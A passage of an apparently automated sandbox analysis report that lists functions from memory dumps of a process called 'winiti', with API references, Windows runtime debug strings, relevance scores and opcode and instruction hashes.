                          • Associated: 00000009.00000002.489080424.00000000009D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.0000000000A30000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_8c0000_winiti.jbxd
                          Similarity
                          • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                          • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                          • API String ID: 885266447-4236105082
                          • Opcode ID: 7f8399c3b9ea445a357b7054912a45873d2b1d515a6ae292e473facf150e1592
                          • Instruction ID: 793d0a2ddc17d124f23479943d463c3082c7fe029ffe019ac97662dd03e1cd72
                          • Opcode Fuzzy Hash: 7f8399c3b9ea445a357b7054912a45873d2b1d515a6ae292e473facf150e1592
                          • Instruction Fuzzy Hash: 91513831B442116FEB14DF19DC81FA633AEBFD8720F218229FD59DB286D965EC418B90
                          Function 009214C0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 91COMMON
                          Download Yara Rule
                          APIs
                          • ___swprintf_l.LIBCMT ref: 0094EA22
                            • Part of subcall function 009213CB: ___swprintf_l.LIBCMT ref: 0092146B
                            • Part of subcall function 009213CB: ___swprintf_l.LIBCMT ref: 00921490
                          • ___swprintf_l.LIBCMT ref: 0092156D
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.489080424.00000000008D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008C0000, based on PE: true
                          • Associated: 00000009.00000002.489080424.00000000008C0000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.00000000009B0000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.00000000009C0000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.00000000009C4000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.00000000009C7000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.00000000009D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.0000000000A30000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_8c0000_winiti.jbxd
                          Similarity
                          • API ID: ___swprintf_l
                          • String ID: %%%u$]:%u
                          • API String ID: 48624451-3050659472
                          • Opcode ID: 71d5ca907205cd4976efabcda740ac7818ff484fdcb5ac6cef4c810901f504f8
                          • Instruction ID: b86a9c3584357acc35dd5c5c0693380c57c963b60c5937a2bbfa751d57c5921c
                          • Opcode Fuzzy Hash: 71d5ca907205cd4976efabcda740ac7818ff484fdcb5ac6cef4c810901f504f8
                          • Instruction Fuzzy Hash: A621C372A002299BCF21DE58DC41EEAB3BCFBA0700F444551FC46D3245DB749A698BE1
                          Function 00983DA7 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 82COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.489080424.00000000008D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008C0000, based on PE: true
                          • Associated: 00000009.00000002.489080424.00000000008C0000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.00000000009B0000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.00000000009C0000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.00000000009C4000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.00000000009C7000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.00000000009D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.0000000000A30000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_8c0000_winiti.jbxd
                          Similarity
                          • API ID: ___swprintf_l
                          • String ID: %%%u$]:%u
                          • API String ID: 48624451-3050659472
                          • Opcode ID: 81721a3fb55582889ffa018c5f4fee21ebf925f0ed174c98256b90dab6242346
                          • Instruction ID: 5b1721c65c84ec3e9bf7db46cd60646394b85713fc4e259570abf2ab07099a87
                          • Opcode Fuzzy Hash: 81721a3fb55582889ffa018c5f4fee21ebf925f0ed174c98256b90dab6242346
                          • Instruction Fuzzy Hash: D0217FB290022AABCB20BE69CC459EF77ACEB59B54F048525FC14D3242E7B49F44C7E1
                          Function 009053A5 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 185COMMON
                          Download Yara Rule
                          APIs
                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 009422F4
                          Strings
                          • RTL: Resource at %p, xrefs: 0094230B
                          • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 009422FC
                          • RTL: Re-Waiting, xrefs: 00942328
                          Memory Dump Source
                          • Source File: 00000009.00000002.489080424.00000000008D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008C0000, based on PE: true
                          • Associated: 00000009.00000002.489080424.00000000008C0000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.00000000009B0000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.00000000009C0000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.00000000009C4000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.00000000009C7000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.00000000009D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.0000000000A30000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_8c0000_winiti.jbxd
                          Similarity
                          • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                          • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                          • API String ID: 885266447-871070163
                          • Opcode ID: b91340d17bf77faace0eef8e4eaa658ae49916064c143a4ddc1e9862bec382eb
                          • Instruction ID: 981150c3536c3a050b69dd4708f98fb73769ec028dfe72511bbc16febd22fefc
                          • Opcode Fuzzy Hash: b91340d17bf77faace0eef8e4eaa658ae49916064c143a4ddc1e9862bec382eb
                          • Instruction Fuzzy Hash: B8512671600711ABEB149F28CC81FA773ACFF94760F114229FD18DB281EAA5ED418BA0
                          Function 0090EC56 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 145COMMON
                          Download Yara Rule
                          Strings
                          • RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu, xrefs: 009424BD
                          • RTL: Enter Critical Section Timeout (%I64u secs) %d, xrefs: 0094248D
                          • RTL: Re-Waiting, xrefs: 009424FA
                          Memory Dump Source
                          • Source File: 00000009.00000002.489080424.00000000008D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008C0000, based on PE: true
                          • Associated: 00000009.00000002.489080424.00000000008C0000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.00000000009B0000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.00000000009C0000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.00000000009C4000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.00000000009C7000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.00000000009D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.0000000000A30000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_8c0000_winiti.jbxd
                          Similarity
                          • API ID:
                          • String ID: RTL: Enter Critical Section Timeout (%I64u secs) %d$RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu$RTL: Re-Waiting
                          • API String ID: 0-3177188983
                          • Opcode ID: 437f2f62e3698289a329e32d2d746f5a88988d9b064090e756940e6b77b82383
                          • Instruction ID: 79d3f361d88bd54194509c2bb0874614fe463adb0ee82fcb9406b4e0bbb3ffdb
                          • Opcode Fuzzy Hash: 437f2f62e3698289a329e32d2d746f5a88988d9b064090e756940e6b77b82383
                          • Instruction Fuzzy Hash: 47410770A00204AFDB20DFA9DC89F6A77B9FF85720F208A15F555DB2D1D738E9418B61
                          Function 0091FCC9 Relevance: 6.3, APIs: 4, Instructions: 257COMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000009.00000002.489080424.00000000008D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008C0000, based on PE: true
                          • Associated: 00000009.00000002.489080424.00000000008C0000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.00000000009B0000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.00000000009C0000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.00000000009C4000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.00000000009C7000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.00000000009D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.0000000000A30000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_8c0000_winiti.jbxd
                          Similarity
                          • API ID: __fassign
                          • String ID:
                          • API String ID: 3965848254-0
                          • Opcode ID: cf2859dc65627fbf80b6c0eada531fd5cb93d2a8787631212c3d4041a421bf55
                          • Instruction ID: 4e83bbbba3a2dd59214ac9b67b663ebc1daac38c6867af60d6e2911b4481eb6c
                          • Opcode Fuzzy Hash: cf2859dc65627fbf80b6c0eada531fd5cb93d2a8787631212c3d4041a421bf55
                          • Instruction Fuzzy Hash: 2C918D36F0020EEBDF24CF98C855AEEB7B8FF55305F20847AD451A61A2E7304A91CB91
                          Function 00995CFA Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 237COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.489080424.00000000008D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008C0000, based on PE: true
                          • Associated: 00000009.00000002.489080424.00000000008C0000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.00000000009B0000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.00000000009C0000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.00000000009C4000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.00000000009C7000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.00000000009D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.0000000000A30000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_8c0000_winiti.jbxd
                          Similarity
                          • API ID: __aulldvrm
                          • String ID: $$0
                          • API String ID: 1302938615-389342756
                          • Opcode ID: 2f12497187ab9f3ba1c306d3c0bdecf7e3213404bbf49b18b7c199b1f955b165
                          • Instruction ID: 1cdd412099ce9efef216fc3a117d576162407bd99f1db3f686f997e7bf408978
                          • Opcode Fuzzy Hash: 2f12497187ab9f3ba1c306d3c0bdecf7e3213404bbf49b18b7c199b1f955b165
                          • Instruction Fuzzy Hash: 0A91AD30D04A8AAFDF26DFADC4443EFBBB4AF41320F16469AD8A1A72D1C3754A41CB50